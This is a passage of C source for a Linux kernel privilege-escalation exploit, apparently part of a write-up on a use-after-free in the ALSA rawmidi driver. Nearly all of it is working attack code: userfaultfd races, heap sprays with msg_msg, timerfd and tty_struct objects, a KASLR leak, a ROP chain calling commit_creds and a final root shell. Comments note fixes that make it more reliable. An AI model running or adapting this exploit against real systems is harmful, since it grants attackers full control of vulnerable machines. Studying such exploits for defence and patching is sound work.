    printf("[+] Got root.\n");

    /* The variadic terminator must be a null pointer of type char *. */
    execl("/bin/sh", "sh", (char *)NULL);

    /* Only reached when execl() failed. */
    perror("[-] execl");
    exit(EXIT_FAILURE);
}

/*
 * Create a userfaultfd object, store its descriptor in the global `uffd`,
 * and register one page starting at `range` for missing-page faults.
 *
 * range: start address of the PAGE_SIZE-byte region to monitor.
 *
 * Any failure is reported with perror() and terminates the process.
 */
void register_userfaultfd(uint64_t *range)
{
    struct uffdio_api uffdio_api;
    struct uffdio_register uffdio_register;
    long ret;

    /* Check the raw syscall result before narrowing it into the global. */
    ret = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);

    if (ret < 0)
    {
        perror("[-] userfaultfd");
        exit(0);
    }

    uffd = ret;

    uffdio_api.api = UFFD_API;
    uffdio_api.features = 0;

    if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
    {
        perror("[-] ioctl");
        exit(0);
    }

    /* Report the range that is actually registered below. */
    printf("[*] Start monitoring range: %p - %p\n",
           (void *)range, (void *)((char *)range + PAGE_SIZE));

    uffdio_register.range.start = (uint64_t) range;
    uffdio_register.range.len = PAGE_SIZE;
    uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;

    if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
    {
        perror("[-] ioctl");
        exit(0);
    }

    puts("[+] Userfaultfd registered");
}

/*
 * Thread routine that services userfaultfd page faults.
 *
 * args: pointer to the 32-bit userfaultfd descriptor.
 *
 * For a fault on one of the three known addresses (0x1337000, 0x3331000,
 * 0x5551000 -- the ADDRESS_PAGE_FAULT1..3 values) the handler waits until
 * release_page_fault becomes true, resolves the fault by copying a prepared
 * page into place with UFFDIO_COPY, and then resets release_page_fault.
 * The prepared page starts with the 8-byte value 0xffff, or with fake_table
 * for the 0x5551000 fault.
 *
 * The service loop never terminates on its own; errors end the process.
 */
void *handler_userfaultfd(void *args)
{
    /*
     * The descriptor object behind `args` is 32 bits wide; reading it
     * through a 64-bit pointer would pull in unrelated adjacent memory.
     */
    int fault_fd = (int)*(const uint32_t *)args;

    struct uffd_msg msg;
    struct uffdio_copy uffdio_copy;
    ssize_t nread;
    void *page2 = NULL;

    if ((page2 = mmap((void *)0xdead000, PAGE_SIZE * 5, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    /* Default payload: presumably lands on msg_msg->m_ts -- verify against caller. */
    uint64_t m_ts = 0x000000000000ffff;
    memcpy(page2, &m_ts, sizeof(m_ts));

    while (true)
    {
        struct pollfd pollfd;
        int nready;

        pollfd.fd = fault_fd;
        pollfd.events = POLLIN;

        nready = poll(&pollfd, 1, -1);

        if (nready == -1)
        {
            perror("[-] poll");
            exit(0);
        }

        nread = read(fault_fd, &msg, sizeof(msg));

        if (nread == 0)
        {
            /* Not an errno condition, so perror() would be misleading. */
            fprintf(stderr, "[-] EOF on userfaultfd!\n");
            exit(0);
        }

        if (nread == -1)
        {
            perror("[-] read");
            exit(0);
        }

        /* Validate the event type before touching the pagefault payload. */
        if (msg.event != UFFD_EVENT_PAGEFAULT)
        {
            fprintf(stderr, "[-] Unexpected event on userfaultfd\n");
            exit(0);
        }

        uint64_t fault_addr = msg.arg.pagefault.address;

        if (fault_addr == 0x1337000 || fault_addr == 0x3331000 || fault_addr == 0x5551000)
        {
            printf("[+] Page Fault triggered on address 0x%llx\n", (unsigned long long)fault_addr);

            if (fault_addr == 0x5551000)
            {
                /* Third stage: the payload is the fake function table address. */
                memcpy(page2, &fake_table, sizeof(fake_table));
            }

            /* Keep the faulting thread blocked until the main thread is ready. */
            while (release_page_fault == false);

            uffdio_copy.src = (uint64_t) page2;
            uffdio_copy.dst = fault_addr & ~(uint64_t)(PAGE_SIZE - 1);
            uffdio_copy.len = PAGE_SIZE;
            uffdio_copy.mode = 0;
            uffdio_copy.copy = 0;

            if (ioctl(fault_fd, UFFDIO_COPY, &uffdio_copy) == -1)
            {
                perror("[-] ioctl");
                exit(0);
            }

            /* Signal the main thread that the fault has been resolved. */
            release_page_fault = false;
        }
    }

    /* Not reached: the loop above has no exit path. */
    close(fault_fd);
    puts("[+] Page fault thread finished");
    return NULL;
}

/*
 * Thread routine that issues a single write() using the address, size and
 * descriptor taken from args.
 *
 * A failing write() is reported with perror() instead of being ignored.
 * Always returns NULL.
 */
void *trigger_userfaultfd(struct args_trigger *args)
{
    char *addr = args->addr;
    int size = args->size;
    int fd = (int) args->fd;

    if (write(fd, addr, size) == -1)
    {
        perror("[-] write");
    }

    return NULL;
}

/*
 * Send one System V message whose text length is `size - 0x30`.
 *
 * qid:     message queue identifier.
 * msg_buf: source of the message text; at least `size - 0x30` bytes are read.
 * size:    target total size; 0x30 is subtracted, which matches the size of
 *          the struct msg_msg header shown in this write-up. Must be at
 *          least 0x30.
 * mtype:   message type stored in the message.
 *
 * Terminates the process with status 1 on invalid size, allocation failure
 * or msgsnd() failure.
 */
void send_msg(int qid, const void *msg_buf, size_t size, long mtype)
{
    const size_t hdr_size = 0x30;
    struct msg_payload
    {
        long mtype;
        char mtext[];
    } *msg;
    size_t text_len;

    /* Guard against the unsigned subtraction below wrapping around. */
    if (size < hdr_size)
    {
        fprintf(stderr, "send_msg: size 0x%zx is smaller than 0x%zx\n", size, hdr_size);
        exit(1);
    }

    text_len = size - hdr_size;

    /* Heap allocation instead of a variable-length array on the stack. */
    msg = malloc(sizeof(*msg) + text_len);

    if (msg == NULL)
    {
        perror("malloc");
        exit(1);
    }

    msg->mtype = mtype;
    memcpy(msg->mtext, msg_buf, text_len);

    if (msgsnd(qid, msg, text_len, 0) == -1)
    {
        perror("msgsnd");
        free(msg);
        exit(1);
    }

    free(msg);
}

/*
 * Receive one message from a System V message queue.
 *
 * qid:  message queue identifier.
 * size: maximum number of message-text bytes to receive.
 *
 * Returns a malloc()ed buffer that starts with the `long` message type
 * followed by the message text, or NULL on failure. The caller owns the
 * returned buffer and must free() it.
 *
 * msgrcv() stores the message type in front of the text, so the buffer is
 * sizeof(long) bytes larger than `size`; a buffer of only `size` bytes
 * could be overrun by a message whose text fills `size`.
 */
void *recv_msg(int qid, size_t size)
{
    void *memdump = malloc(sizeof(long) + size);

    if (memdump == NULL)
    {
        perror("malloc");
        return NULL;
    }

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_NOERROR) == -1)
    {
        perror("msgrcv");
        free(memdump);
        return NULL;
    }

    return memdump;
}

/*
 * Fill buf with two tables built from the globals kernel_base and pivot:
 *
 *   buf + 0x000 : 16 quadwords -- the return-oriented chain listed below
 *   buf + 0x100 : 13 quadwords -- a function-pointer table (main() reports
 *                 its address as the fake tty_struct->ops table)
 *
 * buf must be at least 0x100 + 13 * 8 bytes long. Bytes outside the two
 * tables are left untouched.
 */
void build_rop(char *buf)
{
    const uint64_t chain[] = {
        /* commit_creds(prepare_kernel_cred(0)) */
        kernel_base + 0x15e8,   // pop rdi ; ret
        0x0,
        kernel_base + 0x8a800,  // prepare_kernel_cred
        kernel_base + 0x49fb8,  // pop rdx ; ret
        0x8,
        kernel_base + 0xa6b081, // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret
        kernel_base + 0x3dfdb4, // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret
        kernel_base + 0x8a3c0,  // commit_creds

        /* kpti trampoline */
        kernel_base + 0xc00a45, // swapgs_restore_regs_and_return_to_usermode + 22
        0x0,                    // rax
        0x0,                    // rdi

        /* saved user-mode context to return to */
        (unsigned long)&getRootShell,
        (unsigned long)usr_cs,
        (unsigned long)usr_rflags,
        (unsigned long)usr_sp,
        (unsigned long)usr_ss,
    };

    uint64_t table[13];

    for (size_t slot = 0; slot < 12; slot++)
    {
        if (slot >= 4 && slot <= 6)
        {
            /* slots 4..6 all point at a bare `ret` */
            table[slot] = kernel_base + 0x1e; // ret
        }
        else
        {
            /* recognisable filler tagged with the slot index */
            table[slot] = 0xdeadbeefdeadbe00 + slot;
        }
    }

    /* the slot right after the 12 filled above holds the stack pivot */
    table[12] = pivot;

    memcpy(&buf[0x0], chain, sizeof(chain));
    memcpy(&buf[0x100], table, sizeof(table));
}

/*
 * Restrict the calling thread (pid 0 == caller) to the single CPU cpu_id.
 * A sched_setaffinity() failure is reported through err(), which is defined
 * elsewhere in this file.
 */
void pin_cpu(long cpu_id)
{
    cpu_set_t allowed;

    CPU_ZERO(&allowed);
    CPU_SET(cpu_id, &allowed);

    if (sched_setaffinity(0, sizeof(allowed), &allowed) != -1)
    {
        return;
    }

    err("`sched_setaffinity()` failed: %s", strerror(errno));
}

/*
 * Entry point. Runs the three stages in order, each on a freshly opened
 * rawmidi descriptor and a freshly mapped two-page region whose second page
 * is registered with userfaultfd:
 *
 *   STEP 1 - read back a message on qid[0] and derive kernel_base / pivot
 *            from the timerfd_tmrproc pointer found in it.
 *   STEP 2 - queue the build_rop() payload on qid[1] and read back a message
 *            to learn where that payload lives (next / fake_table).
 *   STEP 3 - repeat the sequence with /dev/ptmx descriptors opened in
 *            between, then issue an ioctl on each of them.
 *
 * Every stage uses the same hand-shake with the fault-handler thread: the
 * main thread sets release_page_fault to true to let the handler resolve the
 * fault, then spins until the handler sets it back to false.
 *
 * Fixes relative to the original:
 *   - ioctl() results were stored in a uint64_t, so every `< 0` check was
 *     always false; they are now held in an int and actually checked.
 *   - the STEP 3 allocation ioctl used fd2, which had already been closed;
 *     it now uses fd3.
 *   - recv_msg() may return NULL; that is checked before dereferencing, and
 *     the returned buffers are freed once read.
 *   - main returns int.
 */
int main(void)
{
    pin_cpu(0);

    struct snd_rawmidi_params srp;
    int ret; /* ioctl() status; must be signed for the -1 checks to work */

    save_state();

    /* ===================== [ STEP 1 - KASLR Leak ] ===================== */

    puts("[+] STEP 1 : KASLR leak");
    fd1 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd1 < 0)
    {
        perror("[-] open");
        exit(0);
    }

    puts("[+] Opening rawmidi");

    int qid[2];
    if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("msgget");
        exit(1);
    }

    /* One-shot timer far in the future, so armed timers stay pending. */
    struct itimerspec its;

    its.it_interval.tv_sec = 0;
    its.it_interval.tv_nsec = 0;
    its.it_value.tv_sec = 9999;
    its.it_value.tv_nsec = 0;

    int tfd[256];

    /* First half of the timerfd descriptors; the second half is created
     * after the message has been queued (see below). */
    for(int i = 0; i < 256 / 2; i++)
    {
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd[i], 0, &its, 0);
    }

    if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    puts("[+] Mapping two pages");

    /* Only the first page is touched here; the second is left unpopulated. */
    char *addr = page;
    memset(addr, 'A', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT1);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */
    pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 256 */
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
    srp.buffer_size = 240;
    srp.avail_min = 1;
    ret = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    if (ret < 0)
    {
        perror("[-] ioctl");
        exit(0);
    }

    puts("[+] Created one object by size 256");

    /* The write starts 0x18 bytes before the page boundary and is 0x20 bytes
     * long, so it crosses into the second page of the mapping. */
    struct args_trigger args;
    args.addr = addr + PAGE_SIZE - 0x18;
    args.size = 0x18 + 0x8;
    args.fd= fd1;

    /* Blocking before object created by size 256 in userfault */
    pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 256 generating an UAF */
    srp.buffer_size = 250;
    ret = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    if (ret < 0)
    {
        perror("[-] ioctl");
        exit(0);
    }

    puts("[+] Deleting before object created by size 256 generating UAF");

    /* send_msg 'A' */
    char buf[0xf8 - 0x30];
    memset(buf, 0x41, sizeof(buf));
    send_msg(qid[0], buf, 0xf8, 1);

    puts("[+] Allocate msg_msg in kmalloc-256");

    printf("[*] Waiting for userfaultd to finish ..\n");
    release_page_fault = true;

    /* spray timerfd_ctx in kmalloc-256 */
    for(int i = 256 / 2; i < 256; i++)
    {
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);
        timerfd_settime(tfd[i], 0, &its, 0);
    }

    puts("[+] Allocate timerfd_ctx in kmalloc-256");

    /* Spin until the handler thread clears the flag again. */
    while(release_page_fault == true);
    printf("[+] Page fault lock released\n");

    uint64_t *leak = recv_msg(qid[0], 0x2000);

    if (leak == NULL)
    {
        puts("[-] recv_msg");
        exit(0);
    }

    // hexdump(leak, 0x2000);

    /* Quadword at byte offset 0x200 of the received buffer. */
    timerfd_tmrproc =  *(leak + (0x200 / sizeof(uint64_t)));
    free(leak);

    kernel_base = timerfd_tmrproc - 0x2201f0;
    pivot = kernel_base + 0x8fc625; // push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret

    printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc);
    printf("[+] kernel_base addr : 0x%lx\n", kernel_base);
    printf("[+] pivot addr : 0x%lx\n", pivot);

    for(int i = 0; i < 256; i++)
    {
        close(tfd[i]);
    }

    close(fd1);
    puts("[+] Close rawmidi");

    /* ===================== [ STEP 2 - SMAP Bypass ] ===================== */

    puts("\n[+] STEP 2 : SMAP bypass");

    release_page_fault = false;

    fd2 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd2 < 0)
    {
        perror("[-] open");
        exit(0);
    }

    puts("[+] Opening rawmidi");

    if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("msgget");
        exit(1);
    }

    if ((page = mmap((void *)0x3330000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    puts("[+] Mapping two pages");

    addr = page;
    memset(addr, 'B', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT2);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */
    pthread_create(&thread[2], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 512 */
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
    srp.buffer_size = 500;
    srp.avail_min = 1;
    ret = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    if (ret < 0)
    {
        perror("[-] ioctl");
        exit(0);
    }

    puts("[+] Created one object by size 512");

    args.addr = addr + PAGE_SIZE - 0x18;
    args.size = 0x18 + 0x8;
    args.fd= fd2;

    /* Blocking before object created by size 512 in userfault */
    pthread_create(&thread[3], NULL, (void *) trigger_userfaultfd, &args);
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 512 generating an UAF */
    srp.buffer_size = 90;
    ret = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    if (ret < 0)
    {
        perror("[-] ioctl");
        exit(0);
    }

    puts("[+] Deleting before object created by size 512 generating UAF");

    /* rop spray in kmalloc-512 */
    char secondary_buf[0x1ea - 0x30];
    memset(secondary_buf, 0, sizeof(secondary_buf));
    build_rop(secondary_buf);

    printf("[*] Waiting for userfaultd to finish ..\n");
    release_page_fault = true;

    for(int i = 0; i < 0x20; i++)
    {
        send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);
    }

    puts("[+] Spray ROP Chain in kmalloc-512");

    while(release_page_fault == true);
    printf("[+] Page fault lock released\n");

    uint64_t *leak2 = recv_msg(qid[1], 0x2000);

    if (leak2 == NULL)
    {
        puts("[-] recv_msg");
        exit(0);
    }

    /* Quadword at byte offset 0x1d8 of the received buffer, advanced by
     * 0x30; build_rop() placed its function table 0x100 bytes into the
     * payload, hence fake_table = next + 0x100. */
    next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30;
    fake_table = next + 0x100;
    free(leak2);

    printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30);
    printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table);

    // hexdump(leak2, 0x2000);

    close(fd2);
    puts("[+] Close rawmidi");

    /* ===================== [ STEP 3 - tty_struct->ops overwrite ] ===================== */

    puts("\n[+] STEP 3 : Fake tty_struct->ops overwrite");

    release_page_fault = false;

    fd3 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd3 < 0)
    {
        perror("[-] open");
        exit(0);
    }

    puts("[+] Re-opening rawmidi");

    if ((page = mmap((void *)0x5550000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)
    {
        perror("[-] mmap()");
        exit(0);
    }

    puts("[+] Mapping two pages");

    addr = page;
    memset(addr, 'C', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT3);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */
    pthread_create(&thread[4], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 800 */
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;
    srp.buffer_size = 800;
    srp.avail_min = 1;
    /* Use fd3 here: fd2 was closed at the end of STEP 2. */
    ret = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    if (ret < 0)
    {
        perror("[-] ioctl");
        exit(0);
    }

    puts("[+] Created one object by kmalloc-1024");

    args.addr = addr + PAGE_SIZE - 0x18;
    args.size = 0x18 + 0x8;
    args.fd= fd3;

    /* Blocking before object created by size 1024 in userfault */
    pthread_create(&thread[5], NULL, (void *) trigger_userfaultfd, &args);
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 1024 generating an UAF */
    srp.buffer_size = 90;
    ret = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    if (ret < 0)
    {
        perror("[-] ioctl");
        exit(0);
    }

    puts("[+] Deleting before object created by size 1024 generating UAF");

    int spray[256];

    /* tty_struct spray */
    for(int i = 0; i < 256; i++)
    {
        spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);

        if(spray[i] < 0)
        {
            printf("[-] Failed open /dev/ptmx\n");
        }
    }

    puts("[+] Allocate tty_struct in kmalloc-1024");

    release_page_fault = true;

    while(release_page_fault == true);
    puts("[+] Page fault lock released");

    /* Issue the ioctl on every sprayed descriptor; descriptors that failed
     * to open are -1 and the call simply fails for them. */
    for(int i = 0; i < 256; i++)
    {
        ioctl(spray[i], 0, next - 8);
    }

    return 0;
}


References